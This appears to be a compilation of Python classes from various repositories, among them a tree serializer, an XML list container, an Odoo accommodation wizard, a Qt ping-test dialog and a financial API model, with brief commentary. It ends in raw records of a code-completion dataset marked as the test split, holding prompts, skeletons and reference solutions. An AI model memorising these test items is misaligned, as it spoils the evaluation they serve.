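With definitions like these in scope, `VanillaProductKernel(data_ref, 'cc')(data)` returns the elementwise product of the two per-column Gaussian Gram matrices, which is exactly the product-kernel construction the class name advertises.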
# --- Codec ---
# Source: hyo-eun-kim/algorithm-study, ch14/saeyoon/ch14_6_saeyoon.py

class Codec:

    def serialize(self, root):
        """Encodes a tree to a single string.

        :type root: TreeNode
        :rtype: str
        """
        queue = deque([root])
        result = []
        while queue:
            node = queue.popleft()
            if node:
                queue.extend([node.left, node.right])
                result.append(str(node.val))
            else:
                result.append('#')
        return ' '.join(result)

    def deserialize(self, data):
        """Decodes your encoded data to tree.

        :type data: str
        :rtype: TreeNode
        """
        if data == '#':
            return None
        nodes = deque(data.split())
        root = TreeNode(int(nodes.popleft()))
        queue = deque([root])
        while queue:
            node = queue.popleft()
            if node:
                l, r = (nodes.popleft(), nodes.popleft())
                node.left = TreeNode(int(l)) if l != '#' else None
                node.right = TreeNode(int(r)) if r != '#' else None
                queue.extend([node.left, node.right])
        return root
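Both directions are the same BFS level-order walk with '#' sentinels for missing children, so the token counts line up and the round trip is stable. A quick check, assuming the usual LeetCode-style `TreeNode` (not shown in the record) and the `deque` import the code needs:

from collections import deque

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

codec = Codec()
tree = TreeNode(1, TreeNode(2), TreeNode(3, TreeNode(4)))
encoded = codec.serialize(tree)              # '1 2 3 # # 4 # # #'
decoded = codec.deserialize(encoded)
assert codec.serialize(decoded) == encoded   # round trip reproduces the encoding
assert codec.deserialize(codec.serialize(None)) is None   # empty tree encodes as '#'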
# --- RelaxListType ---
# Source: jlec/relax, data_store/data_classes.py

class RelaxListType:
    """An empty list type container."""

    def __init__(self):
        """Initialise some class variables."""
        super(RelaxListType, self).__init__()
        self.list_name = 'relax_list'
        self.list_desc = 'relax list container'
        self.element_name = 'relax_list_element'
        self.element_desc = 'relax container'
        self.blacklist = []

    def from_xml(self, super_node, file_version=1):
        """Recreate the data structure from the XML node.

        @param super_node:      The XML nodes.
        @type super_node:       xml.dom.minicompat.Element instance
        @keyword file_version:  The relax XML version of the XML file.
        @type file_version:     int
        """
        xml_to_object(super_node, self, file_version=file_version, blacklist=self.blacklist)
        nodes = super_node.getElementsByTagName(self.element_name)
        for node in nodes:
            self.add_item(node.getAttribute('name'))
            xml_to_object(node, self[-1], file_version=file_version)

    def to_xml(self, doc, element):
        """Create an XML element for the list data structure.

        @param doc:      The XML document object.
        @type doc:       xml.dom.minidom.Document instance
        @param element:  The element to add the list data structure XML element to.
        @type element:   XML element object
        """
        list_element = doc.createElement(self.list_name)
        element.appendChild(list_element)
        list_element.setAttribute('desc', self.list_desc)
        blacklist = ['list_name', 'list_desc', 'element_name', 'element_desc', 'blacklist'] + list(self.__dict__.keys()) + list(RelaxListType.__dict__.keys()) + list(self.__class__.__dict__.keys()) + list(list.__dict__.keys())
        fill_object_contents(doc, list_element, object=self, blacklist=blacklist)
        for i in range(len(self)):
            if hasattr(self[i], 'to_xml'):
                self[i].to_xml(doc, list_element)
            else:
                list_item_element = doc.createElement(self.element_name)
                list_element.appendChild(list_item_element)
                list_item_element.setAttribute('index', repr(i))
                list_item_element.setAttribute('desc', self.element_desc)
                blacklist = list(self[i].__class__.__dict__.keys())
                for name in dir(self[i]):
                    if name in blacklist:
                        continue
                    if search('^_', name):
                        continue
                    obj = getattr(self[i], name)
                    if hasattr(obj, 'to_xml'):
                        obj.to_xml(doc, list_item_element)
                        blacklist = blacklist + [name]
                fill_object_contents(doc, list_item_element, object=self[i], blacklist=blacklist)
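The class indexes itself (`self[-1]`, `len(self)`) and calls an `add_item` it never defines, so it is evidently a mixin meant to sit alongside `list` in a concrete subclass. A hypothetical pairing, where the element class and all names are invented for illustration (`xml_to_object` and `fill_object_contents` remain relax's own XML helpers):

class DemoElement:
    # Hypothetical element container; anything carrying plain attributes works.
    def __init__(self, name):
        self.name = name

class DemoList(RelaxListType, list):
    def __init__(self):
        super().__init__()            # runs RelaxListType.__init__, then list.__init__
        self.list_name = 'demo_list'
        self.element_name = 'demo_element'

    def add_item(self, name):
        # from_xml() appends via add_item() and then fills self[-1] in place.
        self.append(DemoElement(name))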
# --- wiz_vacant_bed ---
# Source: Muhammad-SF/Test, core/sg_accommodation/wizard/wiz_vacant_bed.py

class wiz_vacant_bed:

    def onchange_employee(self):
        """Identify the bed and room based on the employee selected.

        @param self:  object pointer
        @return:      True
        """
        cr, uid, context = self.env.args
        emp_id = self.employee_id.id
        if emp_id:
            bed_id = self.env['beds.beds'].search([('employee_id', '=', self.employee_id.id), ('room_id.accommodation_id', '=', context.get('accommodation_id'))])
            if not bed_id:
                emp_name = self.employee_id.name
                raise ValidationError('The Employee is not accommodated here! ' + emp_name)
            self.bed_id = bed_id.id
            self.room_id = bed_id.room_id.id

    def vacant_bed(self):
        """Vacate the bed in a room in the accommodation.

        @api.multi:   the api multi decorator
        @param self:  object pointer and record set
        @return:      True
        """
        for vac_rec in self:
            history_vals = {
                'bed_id': vac_rec.bed_id.id,
                'room_id': vac_rec.room_id.id,
                'accommodation_id': vac_rec.room_id.accommodation_id.id,
                'date': time.strftime(DEFAULT_SERVER_DATETIME_FORMAT),
                'employee_id': vac_rec.bed_id.employee_id.id,
                'country_id': vac_rec.bed_id.employee_id.emp_country_id.id,
                'type': 'vacant',
            }
            vac_rec.bed_id.write({'employee_id': False})
            self.env['accommodation.history'].create(history_vals)
            vac_rec.employee_id.write({'accommodated': False})
        return True
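These bodies read like an Odoo transient-model wizard from the 8.x-era new API (`self.env.args`, `@api.multi`). The record never shows the model declaration or fields, so the scaffold below is guesswork; the imports and decorators are standard Odoo, but every model and field name marked below is an assumption:

import time
from odoo import api, fields, models          # the package is 'openerp' on versions <= 9
from odoo.exceptions import ValidationError
from odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT

class wiz_vacant_bed(models.TransientModel):
    _name = 'wiz.vacant.bed'                  # hypothetical; the record omits the declaration

    employee_id = fields.Many2one('hr.employee', string='Employee')
    bed_id = fields.Many2one('beds.beds', string='Bed')
    room_id = fields.Many2one('beds.rooms', string='Room')   # comodel name guessed

    @api.onchange('employee_id')
    def onchange_employee(self):
        ...                                   # body as in the record above

    @api.multi                                # matches the '@api.multi' note in the docstring
    def vacant_bed(self):
        ...                                   # body as in the record above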
# --- DialogComControlDeviceExecute1 ---
# Source: gaoxingyu-hub/54testframework-master-e284, modules/com_control_device_new/COM_CONTROL_DEVICE_EXECUTE1.py

class DialogComControlDeviceExecute1:
    """Class documentation goes here."""

    def __init__(self, parent=None):
        """Constructor.

        @param parent: reference to the parent widget
        @type parent:  QWidget
        """
        super(DialogComControlDeviceExecute1, self).__init__(parent)
        self.setupUi(self)
        self.flag = 1

    def set_contents(self, title, contents, img_file_path):
        """Set the GUI display information.

        :param title:          dialog window title
        :param contents:       dialog content browser information
        :param img_file_path:  the image file's full path, if there is one
        :return:
        """
        try:
            self.setWindowTitle(title)
            self.textBrowser_contents.setText(contents)
            if os.path.isfile(img_file_path) and os.access(img_file_path, os.W_OK):
                self.label_img.setPixmap(QtGui.QPixmap(img_file_path))
        except Exception:
            pass

    def on_pushButton_execute_clicked(self):
        """Execute the test process."""
        ip = self.lineEdit_ip.text()
        if not ThDataChecker.is_ip(ip):
            QMessageBox.warning(self, ModuleConstants.QMESSAGEBOX_WARN, ModuleConstants.QMESSAGEBOX_WARN_IP_NOT_VALID)
            return
        try:
            if self.textBrowser_log.document().blockCount() > 10:
                self.textBrowser_log.clear()
            result = ThNetworkTestCase.ping(ip, 2, 4)
            self.test_result[self.windowTitle()] = result[0]
            if result[1] is not None:
                self.textBrowser_log.append('')
                for item in result[1]:
                    self.textBrowser_log.append(str(item))
            self.textBrowser_log.append('ping test: ' + str(result[0]))
        except BaseException as e:
            logger.error(str(e))

    def on_pushButton_next_clicked(self):
        """Next test case."""
        temp = TestDataProtocolTransferBoard()
        temp.lan2 = 'success'
        temp.lan3 = 'success'
        temp.lan4 = 'success'
        temp.lan5 = 'success'
        temp.lan6 = 'success'
        temp.lan7 = 'success'
        temp.lan8 = 'success'
        temp = temp.to_list()
        self._signalFinish.emit(Constants.SIGNAL_TEST_RESULT, temp)
        self._signalFinish.emit(ModuleConstants.PROCESS_CONTROL_NEXT, temp)
        self.accept()
        self.close()
# --- CustomerAccountPosition ---

class CustomerAccountPosition:
    """Implementation of the 'Customer Account Position' model.

    Details for investment account holdings.

    Attributes:
        id (long|int): The id of the investment position
        description (string): The description of the holding
        cusip_no (long|int): Cusip number for the investment holding
        symbol (string): The symbol of the investment holding
        quantity (float): The quantity of investment holdings
        current_price (float): The current price of the investment holding
        fund_name (string): The fund name for the investment holding
        security_name (string): The security name for the investment holding
        transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc
        market_value (float): The marke
    """

    def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):
        """Constructor for the CustomerAccountPosition class."""
        self.id = id
        self.description = description
        self.cusip_no = cusip_no
        self.symbol = symbol
        self.quantity = quantity
        self.current_price = current_price
        self.fund_name = fund_name
        self.security_name = security_name
        self.transaction_type = transaction_type
        self.market_value = market_value
        self.cost_basis = cost_basis
        self.units = units
        self.unit_price = unit_price
        self.status = status
        self.current_price_date = current_price_date
        self.inv_security_type = inv_security_type
        self.additional_properties = additional_properties

    @classmethod
    def from_dictionary(cls, dictionary):
        """Creates an instance of this model from a dictionary.

        Args:
            dictionary (dictionary): A dictionary representation of the object as
                obtained from the deserialization of the server's response. The
                keys MUST match property names in the API description.

        Returns:
            object: An instance of this structure class.
        """
        if dictionary is None:
            return None
        id = dictionary.get('id')
        description = dictionary.get('description')
        cusip_no = dictionary.get('cusipNo')
        symbol = dictionary.get('symbol')
        quantity = dictionary.get('quantity')
        current_price = dictionary.get('currentPrice')
        fund_name = dictionary.get('fundName')
        security_name = dictionary.get('securityName')
        transaction_type = dictionary.get('transactionType')
        market_value = dictionary.get('marketValue')
        cost_basis = dictionary.get('costBasis')
        units = dictionary.get('units')
        unit_price = dictionary.get('unitPrice')
        status = dictionary.get('status')
        current_price_date = dictionary.get('currentPriceDate')
        inv_security_type = dictionary.get('invSecurityType')
        for key in cls._names.values():
            if key in dictionary:
                del dictionary[key]
        return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)
Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CustomerAccountPosition:\n \"\"\"Implementation of the 'Customer Account Position' model. Details for investment account holdings Attributes: id (long|int): The id of the investment position description (string): The description of the holding cusip_no (long|int): Cusip number for the investment holding symbol (string): The symbol of the investment holding quantity (float): The quantity of investment holdings current_price (float): The current price of the investment holding fund_name (string): The fund name for the investment holding security_name (string): The security name for the investment holding transaction_type (string): The transaction type of the holding. Cash, Margin, POSSTOCK, Etc market_value (float): The marke\"\"\"\n\n def __init__(self, id=None, description=None, cusip_no=None, symbol=None, quantity=None, current_price=None, fund_name=None, security_name=None, transaction_type=None, market_value=None, cost_basis=None, units=None, unit_price=None, status=None, current_price_date=None, inv_security_type=None, additional_properties={}):\n \"\"\"Constructor for the CustomerAccountPosition class\"\"\"\n self.id = id\n self.description = description\n self.cusip_no = cusip_no\n self.symbol = symbol\n self.quantity = quantity\n self.current_price = current_price\n self.fund_name = fund_name\n self.security_name = security_name\n self.transaction_type = transaction_type\n self.market_value = market_value\n self.cost_basis = cost_basis\n self.units = units\n self.unit_price = unit_price\n self.status = status\n self.current_price_date = current_price_date\n self.inv_security_type = inv_security_type\n self.additional_properties = additional_properties\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n id = dictionary.get('id')\n description = dictionary.get('description')\n cusip_no = dictionary.get('cusipNo')\n symbol = dictionary.get('symbol')\n quantity = dictionary.get('quantity')\n current_price = dictionary.get('currentPrice')\n fund_name = dictionary.get('fundName')\n security_name = dictionary.get('securityName')\n transaction_type = dictionary.get('transactionType')\n market_value = dictionary.get('marketValue')\n cost_basis = dictionary.get('costBasis')\n units = dictionary.get('units')\n unit_price = dictionary.get('unitPrice')\n status = dictionary.get('status')\n current_price_date = dictionary.get('currentPriceDate')\n inv_security_type = dictionary.get('invSecurityType')\n for key in cls._names.values():\n if key in dictionary:\n del dictionary[key]\n return cls(id, description, cusip_no, symbol, quantity, current_price, fund_name, security_name, transaction_type, market_value, cost_basis, units, unit_price, status, current_price_date, inv_security_type, dictionary)\n", "source": "the_stack_v2_python_sparse", "source_path": "finicityapi/models/customer_account_position.py", "source_repo": "monarchmoney/finicity-python", "split": "test", "star_events_count": 0} {"blob_id": "e936fa99361410dd4af805eacb81c0ed88056446", "bodies": ["tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\nif reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\nself.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\nself.alphabet = _generate_alphabet_dict(self.subtoken_list)\nself.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\nself.max_subtoken_length = 0\nfor subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\nself._cache_size = 2 ** 20\nself._cache = [(None, None)] * self._cache_size", "if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\nif tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\nelse:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' 
% len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\nreturn Subtokenizer(vocab_file)", "ret = []\ntokens = _split_string_to_tokens(_native_to_unicode(raw_string))\nfor token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\nif add_eos:\n ret.append(EOS_ID)\nreturn ret", "cache_location = hash(token) % self._cache_size\ncache_key, cache_value = self._cache[cache_location]\nif cache_key == token:\n return cache_value\nret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\nret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\nself._cache[cache_location] = (token, ret)\nreturn ret", "if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\nif not subtokens:\n return ''\nassert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\nreturn _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))", "escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\nescaped_tokens = escaped_tokens.split('_')\nret = []\nfor token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\nreturn ret"], "bodies_text": "<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' 
% len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "class_docstring": "Encodes and decodes strings to/from integer IDs.", "class_name": "Subtokenizer", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' 
% vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if tf.io.gfile.exists(vocab_file):\n tf.compat.v1.logging.info('Vocab file already exists (%s)' % vocab_file)\n else:\n tf.compat.v1.logging.info('Begin steps to create subtoken vocabulary...')\n token_counts = _count_tokens(files, file_byte_limit)\n alphabet = _generate_alphabet_dict(token_counts)\n subtoken_list = _generate_subtokens_with_target_vocab_size(token_counts, alphabet, target_vocab_size, threshold, min_count, reserved_tokens)\n tf.compat.v1.logging.info('Generated vocabulary with %d subtokens.' % len(subtoken_list))\n mlperf_log.transformer_print(key=mlperf_log.PREPROC_VOCAB_SIZE, value=len(subtoken_list))\n _save_vocab_file(vocab_file, subtoken_list)\n return Subtokenizer(vocab_file)\n<|end_body_1|>\n\n<|body_start_2|>\n ret = []\n tokens = _split_string_to_tokens(_native_to_unicode(raw_string))\n for token in tokens:\n ret.extend(self._token_to_subtoken_ids(token))\n if add_eos:\n ret.append(EOS_ID)\n return ret\n<|end_body_2|>\n\n<|body_start_3|>\n cache_location = hash(token) % self._cache_size\n cache_key, cache_value = self._cache[cache_location]\n if cache_key == token:\n return cache_value\n ret = _split_token_to_subtokens(_escape_token(token, self.alphabet), self.subtoken_to_id_dict, self.max_subtoken_length)\n ret = [self.subtoken_to_id_dict[subtoken_id] for subtoken_id in ret]\n self._cache[cache_location] = (token, ret)\n return ret\n<|end_body_3|>\n\n<|body_start_4|>\n if isinstance(subtokens, np.ndarray):\n subtokens = subtokens.tolist()\n if not subtokens:\n return ''\n assert isinstance(subtokens, list) and isinstance(subtokens[0], int), 'Subtokens argument passed into decode() must be a list of integers.'\n return _unicode_to_native(_join_tokens_to_string(self._subtoken_ids_to_tokens(subtokens)))\n<|end_body_4|>\n\n<|body_start_5|>\n escaped_tokens = ''.join([self.subtoken_list[s] for s in subtokens if s < len(self.subtoken_list)])\n escaped_tokens = escaped_tokens.split('_')\n ret = []\n for token in escaped_tokens:\n if token:\n ret.append(_unescape_token(token))\n return ret\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000433", "length_bytes": 22774, "license_type": "permissive", "methods": [{"docstring": "Initializes class, creating a vocab file if data_files is provided.", "name": "__init__", "signature": "def __init__(self, vocab_file, reserved_tokens=None)"}, {"docstring": "Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. 
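
The `_token_to_subtoken_ids` body shown in this record uses a fixed-size, direct-mapped cache rather than a dict: `hash(token) % self._cache_size` picks a slot, and a colliding token simply overwrites whatever was there. A minimal self-contained sketch of that trade-off (bounded memory, no eviction bookkeeping, occasional recomputation on collision):

```python
# Stripped-down version of the direct-mapped cache pattern used in
# _token_to_subtoken_ids: one slot per hash bucket, overwritten on
# collision, so memory stays bounded at exactly `size` entries.
class DirectMappedCache:
    def __init__(self, size=2 ** 20):
        self._size = size
        self._slots = [(None, None)] * size  # (key, value) pairs

    def get_or_compute(self, key, compute):
        slot = hash(key) % self._size
        cached_key, cached_value = self._slots[slot]
        if cached_key == key:              # hit: this key landed here before
            return cached_value
        value = compute(key)               # miss (or collision): recompute
        self._slots[slot] = (key, value)   # evict whatever held the slot
        return value


cache = DirectMappedCache(size=1024)
ids = cache.get_or_compute("hello", lambda tok: [ord(c) for c in tok])
assert cache.get_or_compute("hello", lambda tok: []) == ids  # served from cache
```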
file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string", "name": "init_from_files", "signature": "def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None)"}, {"docstring": "Encodes a string into a list of int subtoken ids.", "name": "encode", "signature": "def encode(self, raw_string, add_eos=False)"}, {"docstring": "Encode a single token into a list of subtoken ids.", "name": "_token_to_subtoken_ids", "signature": "def _token_to_subtoken_ids(self, token)"}, {"docstring": "Converts list of int subtokens ids into a string.", "name": "decode", "signature": "def decode(self, subtokens)"}, {"docstring": "Convert list of int subtoken ids to a list of string tokens.", "name": "_subtoken_ids_to_tokens", "signature": "def _subtoken_ids_to_tokens(self, subtokens)"}], "n_methods": 6, "prompt": "Implement the Python class `Subtokenizer` described below.\n\nClass description:\nEncodes and decodes strings to/from integer IDs.\n\nMethod signatures and docstrings:\n- def __init__(self, vocab_file, reserved_tokens=None): Initializes class, creating a vocab file if data_files is provided.\n- def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None): Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\n- def encode(self, raw_string, add_eos=False): Encodes a string into a list of int subtoken ids.\n- def _token_to_subtoken_ids(self, token): Encode a single token into a list of subtoken ids.\n- def decode(self, subtokens): Converts list of int subtokens ids into a string.\n- def _subtoken_ids_to_tokens(self, subtokens): Convert list of int subtoken ids to a list of string tokens.", "prompted_full_text": "Implement the Python class `Subtokenizer` described below.\n\nClass description:\nEncodes and decodes strings to/from integer IDs.\n\nMethod signatures and docstrings:\n- def __init__(self, vocab_file, reserved_tokens=None): Initializes class, creating a vocab file if data_files is provided.\n- def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None): Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. 
file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\n- def encode(self, raw_string, add_eos=False): Encodes a string into a list of int subtoken ids.\n- def _token_to_subtoken_ids(self, token): Encode a single token into a list of subtoken ids.\n- def decode(self, subtokens): Converts list of int subtokens ids into a string.\n- def _subtoken_ids_to_tokens(self, subtokens): Convert list of int subtoken ids to a list of string tokens.\n\n<|skeleton|>\nclass Subtokenizer:\n \"\"\"Encodes and decodes strings to/from integer IDs.\"\"\"\n\n def __init__(self, vocab_file, reserved_tokens=None):\n \"\"\"Initializes class, creating a vocab file if data_files is provided.\"\"\"\n <|body_0|>\n\n def init_from_files(vocab_file, files, target_vocab_size, threshold, min_count=None, file_byte_limit=1000000.0, reserved_tokens=None):\n \"\"\"Create subtoken vocabulary based on files, and save vocab to file. Args: vocab_file: String name of vocab file to store subtoken vocabulary. files: List of file paths that will be used to generate vocabulary. target_vocab_size: target vocabulary size to generate. threshold: int threshold of vocabulary size to accept. min_count: int minimum count to use for generating the vocabulary. The min count is the minimum number of times a subtoken should appear in the files before it is added to the vocabulary. If set to none, this value is found using binary search. file_byte_limit: (Default 1e6) Maximum number of bytes of sample text that will be drawn from the files. reserved_tokens: List of string\"\"\"\n <|body_1|>\n\n def encode(self, raw_string, add_eos=False):\n \"\"\"Encodes a string into a list of int subtoken ids.\"\"\"\n <|body_2|>\n\n def _token_to_subtoken_ids(self, token):\n \"\"\"Encode a single token into a list of subtoken ids.\"\"\"\n <|body_3|>\n\n def decode(self, subtokens):\n \"\"\"Converts list of int subtokens ids into a string.\"\"\"\n <|body_4|>\n\n def _subtoken_ids_to_tokens(self, subtokens):\n \"\"\"Convert list of int subtoken ids to a list of string tokens.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tf.compat.v1.logging.info('Initializing Subtokenizer from file %s.' % vocab_file)\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n self.subtoken_list = _load_vocab_file(vocab_file, reserved_tokens)\n self.alphabet = _generate_alphabet_dict(self.subtoken_list)\n self.subtoken_to_id_dict = _list_to_index_dict(self.subtoken_list)\n self.max_subtoken_length = 0\n for subtoken in self.subtoken_list:\n self.max_subtoken_length = max(self.max_subtoken_length, len(subtoken))\n self._cache_size = 2 ** 20\n self._cache = [(None, None)] * self._cache_size\n<|end_body_0|>\n\n<|body_start_1|>\n if reserved_tokens is None:\n reserved_tokens = RESERVED_TOKENS\n if 